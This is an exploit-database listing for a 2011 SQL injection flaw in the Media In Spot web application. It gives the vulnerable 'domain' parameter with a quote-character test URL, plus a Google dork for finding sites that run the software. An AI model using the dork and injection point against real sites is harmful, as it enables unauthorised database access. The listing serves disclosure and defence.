header-logo
Suggest Exploit
vendor:
Media In Spot
by:
Iolo Morganwg
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Media In Spot
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2011

Media In Spot SQL Injection

The domain parameter in the URL http://site/view/lang/index.php?page=area.php&domain=3%27 is vulnerable to SQL injection.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Media In Spot SQL Injection
# Google Dork: intext:""Powered By Media In Spot"
# Date: 16/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.mediainspot.com/
# Note: domain parameter is vulnerable to sql injection

# Vulnerability
http://site/view/lang/index.php?page=area.php&domain=3%27